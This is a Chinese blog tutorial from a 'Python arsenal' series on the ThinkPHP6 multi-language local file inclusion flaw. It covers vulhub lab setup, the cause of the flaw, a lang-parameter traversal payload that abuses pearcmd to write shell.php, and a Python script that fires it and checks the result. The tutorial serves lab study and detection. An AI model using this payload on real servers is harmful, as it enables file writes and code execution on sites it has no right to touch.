Python武器库开发-武器库篇之ThinkPHP6 多语言本地文件包含漏洞(六十七)

于 2024-06-24 19:55:38 发布
阅读量982 收藏 19
点赞数 20
分类专栏: Python武器库开发 文章标签: python 开发语言 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_64973687/article/details/139936241
版权

Python武器库开发-武器库篇之ThinkPHP6 多语言本地文件包含漏洞(六十七)

漏洞环境搭建

这里我们使用Kali虚拟机安装docker并搭建vulhub靶场来进行ThinkPHP漏洞环境的安装,我们进入 ThinkPHP漏洞环境,可以 cd ThinkPHP,然后通过 ls 查看可以搭建的靶场,目前 vulhub关于 ThinkPHP漏洞。可以搭建的靶场有五个。我们拿 lang-rce 漏洞举例,如果我们想要安装lang-rce 漏洞环境,可以 cd 到 lang-rce ,然后输入以下命令启动靶场环境:

docker-compose up -d

在这里插入图片描述

然后我们在浏览器输入 https://localhost:8084 就可以访问靶场环境

在这里插入图片描述

ThinkPHP6 多语言本地文件包含漏洞原理

ThinkPHP6 多语言本地文件包含漏洞原理是在使用ThinkPHP6框架时,如果开启了多语言功能且未对用户输入进行安全过滤,恶意用户可以通过构造恶意请求,将任意文件包含到系统中进行执行。

具体原理如下:

  1. 默认情况下,ThinkPHP6框架会在应用目录下的lang目录中存放多语言文件,文件名为语言标识符;

  2. 恶意用户可以通过构造请求,将恶意文件名作为语言标识符传入;

  3. ThinkPHP6框架在处理多语言功能时,会自动根据语言标识符加载对应的语言文件;

  4. 如果用户传入的语言标识符是恶意文件名,框架则会将该文件包含到系统中进行执行;

  5. 恶意文件可以是任意PHP代码,因此可以执行任意命令,包括读取敏感文件、执行系统命令等。

这个漏洞的产生主要是由于未对用户输入进行安全过滤和验证导致的,解决方法是对用户输入进行严格的过滤和验证,避免恶意用户传入恶意文件名。同时,应及时对框架进行升级,以获取最新的安全补丁。

ThinkPHP6 多语言本地文件包含漏洞POC

接下来我们给出ThinkPHP6 多语言本地文件包含漏洞的POC,代码内容如下:

?lang=../../../../../public/index
index.php?+config-create+/&lang=../../../../../../../../../../../usr/local/lib/php/pearcmd&/<?=phpinfo()?>+shell.php

我们向URL路径上添加该POC得到如下的这么一个页面:

在这里插入图片描述

ThinkPHP6 多语言本地文件包含漏洞POC编写

现在我们用python编写检测ThinkPHP6 多语言本地文件包含漏洞的代码,内容如下:

#!/usr/bin/env python

import requests
from urllib.parse import urljoin

def thinkphp6_lang(url):
    payload = urljoin(url,'index.php?+config-create+/&lang=../../../../../../../../../../../usr/local/lib/php/pearcmd&/<?=phpinfo()?>+shell.php')
    response = requests.get(payload, verify=False)
    url2 = url + 'shell.php'
    response2 = requests.get(url2, verify=False)
    if response2.status_code == 200:
        print('漏洞存在')
    else:
        print("漏洞不存在")

if __name__ == '__main__':
    url = 'http://localhost:8084/'
    thinkphp6_lang(url)

POC代码详细分析

这段代码是一个用于检测ThinkPHP6漏洞的Python脚本,它利用构造的URL参数来触发漏洞,检查目标URL是否受到该漏洞的影响。如果漏洞存在,则打印"漏洞存在",否则打印"漏洞不存在"。

  1. 脚本开头声明了使用Python解释器来运行脚本。

  2. 导入了requests库用于发送HTTP请求。

  3. 导入了urljoin函数,用于拼接URL。

  4. 定义了一个名为thinkphp6_lang的函数,接受一个参数url

  5. 在函数内部,使用urljoin函数将漏洞的payload拼接到给定的URL上。payload的构造是通过传递URL参数来触发ThinkPHP6的漏洞,出现文件包含和代码执行的情况。

  6. 使用requests.get方法发送带有构造好的payload的HTTP GET请求,并将响应存储在response变量中。verify=False是为了关闭SSL验证。

  7. 构造一个新的URL,结合原始URL和shell.php文件名。

  8. 使用requests.get方法发送带有新URL的HTTP GET请求,并将响应存储在response2变量中。

  9. 如果第二个请求的状态码为200,则打印"漏洞存在";否则打印"漏洞不存在"。

  10. 在主函数中,定义一个名为url的变量,并将其设置为本地主机的URL和端口。

  11. 调用thinkphp6_lang函数,将url作为参数传递进去。

运行效果图

如下是我们这串代码的实际运行效果图:

在这里插入图片描述

怰月
关注
  • 20
    点赞
  • 19
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
ThinkPHP v6.0.x反序列化漏洞复现与分析
m0_61083409的博客
06-18 2021
初始环境,需要注意的是,新版v6基于开发 使用进行安装 坑点,截止到 ,默认核心安装的为 但是到最后面部分代码段已经修复了利用点,所以为了避免大家再次踩坑,请部署完成后,请前往 中,修改核心依赖相关版本,回退更新 进行回退更新,没有出现报错即成功 开启web服务进行验证访问’ 注意:实际测试需要PHP版本>7.2.5**** 版本安装后默认使用单应用模式部署,url访问受到路由模式的影响,为了使用方便,我们先要去 中将 访问控制器中的方法名,并且传递参数值 需要编写一个控制器模块并存在反序列化可控点,这样
thinkphp6.x 反序列化漏洞
weixin_61785633的博客
07-09 1029
thinkphp5.x的反序列化还在贴图片,md文件不能直接沾上来难受,而这个遇到个奇怪的问题,一个代码开始能运行,过段时间居然报错了,不得不说计算机挺玄学的。
ThinkPHP6.0 反序列化漏洞
Sentiment的博客
05-31 2979
当时学tp就是为了国赛,审了审3和5的寻思已经够用了肯定不能出6的吧就没再审,没想到这次就出了6.012的反序列化还好很简单,所以还是回过头审一遍吧 配置 序言 · ThinkPHP6.0完全开发手册 · 看云 (kancloud.cn) 6.0.1 composer create-project topthink/think tp6.0.1 "require": { "php": ">=7.1.0", "topthink/framework": "6.0.1
Thinkphp6.0.x反序列化漏洞复现
shinygod的博客
11-20 2158
Thinkphp6.0.x反序列化漏洞复现
thinkphp6.0漏洞复现
qq_44657899的博客
01-19 8291
环境搭建 我打算安装在kali上面,首先下载tp6到kali上 // 1. 下载composer.phar: curl -sS https://getcomposer.org/installer | php // 2. 将 composer 命令移动到bin目录,使之全局可用 mv composer.phar /usr/local/bin/composer // 3. 设置中国全量镜像,提升访问速度 composer config -g repo.packagist composer ht
thinkphp 6.x 任意文件写入漏洞
Aiwin的博客
08-06 3836
thinkphp 6.x 任意文件写入漏洞
ThinkPHP Lang多语言本地文件包含漏洞(QVD-2022-46174)漏洞复现
weixin_45653478的博客
04-27 559
ThinkPHP是一个在中国使用较多的PHP框架。在其6.0.13版本及以前,存在一处本地文件包含漏洞。当ThinkPHP开启了多语言功能时,攻击者可以通过lang参数和目录穿越实现文件包含,当存在其他扩展模块如 pear 扩展时,攻击者可进一步利用文件包含实现远程代码执行。影响版本。
thinkphp6文件写入漏洞
01-08
标题中的“ThinkPHP6文件写入漏洞”是一个关于网络安全的具体问题,主要涉及到的是ThinkPHP6框架在处理文件操作时可能出现的安全隐患。ThinkPHP是广泛应用于中国的一个开源PHP框架,其最新版本6.0在设计和实现过程中...
tp6-vue-admin:基于thinkphp6+vue2.6+element2.13 前后端分离落地解决方案
05-02
#thinkphp6+vue2.6+element2.13 前后端分离落地解决方案 本人开发环境版本信息: npm=6.13.4 vue =@vue/cli 4.1.2 node=v12.14.1 #注意1:vue-admin 中接口请求规则和动态路由,是对应tp6 中的接口规则和权限规则,...
lake-admin:lake-admin是一种基于ThinkPHP6和Layui的后台开发框架
02-25
lake-admin是一种基于ThinkPHP6 + Layui的后台开发框架。项目介绍lake-admin基于ThinkPHP框架,后台页面基于Layui更新ThinkPHP版本到v6.0.7更新Layui版本到v2.5.7模块插件文档请查看docs/lake-admin-addon.md文件...
python3编写ThinkPHP命令执行Getshell的方法
09-19
主要介绍了python3编写ThinkPHP命令执行Getshell的方法,小编觉得挺不错的,现在分享给大家,也给大家做个参考。一起跟随小编过来看看吧
计算机后端-PHP视频教程. php之thinkphp6 Model操作.wmv
05-22
计算机后端-PHP视频教程. php之thinkphp6 Model操作.wmv
thinkphp实现多语言功能(语言包)
12-19
ThinkPHP框架中实现多语言功能,主要是为了提供更加国际化和本地化的用户体验。这个功能使得网站或应用可以适应不同国家和地区用户的语言需求。以下是如何在ThinkPHP中设置和使用多语言功能的详细步骤: 首先,...
thinkphp 调用python脚本
12-22 655
header("Content-type: text/html; charset=utf-8"); exec("python ./demo2.py 20141010",$array,$ret); dump($array); foreach ($array as $a){ dump($a); } #coding:utf-8 print ("ok"); print("错误");
thinkphp python_thinkphp5+python.apscheduler实现计划任务
weixin_36430300的博客
12-23 135
1.thinkphp5配置自定义命令行/application/console/commandnamespace app\console\command;use think\console\Command;use think\console\Input;use think\console\input\Argument;use think\console\input\Option;use think...
thinkphp python_ThinkPhp 5.0 服务器搭建问题总结
weixin_39904268的博客
12-23 114
前言本文主要用来总结使用ThinkPhp 5.0 在搭建服务器中遇到的问题,持续更新。1、数据库导入mysql文件新建一个编码为utf-8的数据库CREATE DATABASE `test` DEFAULT CHARACTER SET utf8 COLLATE utf8_general_ci;导入数据库将指定目录下的sql文件导入到test数据库中******为数据库密码mysql -uroot ...
ThinkPHP漏洞合集(专注渗透视角)_thinkphp v6(2),2024年最新面试题+笔记+项目实战
04-15 1022
*漏洞原理:**ThinkPHP是在中国使用极为广泛的PHP开发框架。在其版本5.0(
thinkphp python_python3编写ThinkPHP命令执行Getshell的方法
weixin_31885875的博客
12-23 202
加了三个验证漏洞以及四个getshell方法# /usr/bin/env python3# -*- coding: utf-8 -*-# @Author: Morker# @Email: [email]admin@nsf.me[/email]# @Blog: [url]http://nsf.me/[/url]import requestsimport sysdef demo():print(' ...
thinkphp5.0.24文件包含漏洞
最新发布
06-08
ThinkPHP 5.0.24版本存在一个文件包含漏洞,也称为“ThinkPHP5.0.24远程代码执行(RCE)漏洞”。这个漏洞源于框架中的一个设计缺陷,它允许恶意用户利用特定条件下的参数控制来执行任意文件包含操作,从而可能导致攻击者能够获取敏感信息或执行未经授权的操作。 漏洞细节: - 漏洞存在于`ThinkPHP/Library/Think/Loader.php`文件的`import`方法中,当处理动态导入路径时,没有正确验证和过滤输入。 - 攻击者可以通过构造恶意的`import`调用,如`think/Loader::import('..path/to/file');`,利用这个漏洞来包含和执行他们选择的任意文件。 影响范围和修复: - 这个漏洞可能影响到使用ThinkPHP 5.0.24版本的网站,特别是那些在用户输入未经充分验证的情况下调用`import`方法的应用。 - ThinkPHP团队已经发布了安全补丁,修复了这个问题,用户应该尽快更新到最新版本,或者按照官方文档的指导进行漏洞修复。 相关问题: 1. 怎样避免ThinkPHP应用受到此漏洞的影响? 2. 如何检查我的ThinkPHP项目是否受到了该漏洞影响? 3. 安装了补丁后,还需要做哪些额外的安全措施?
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

怰月

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值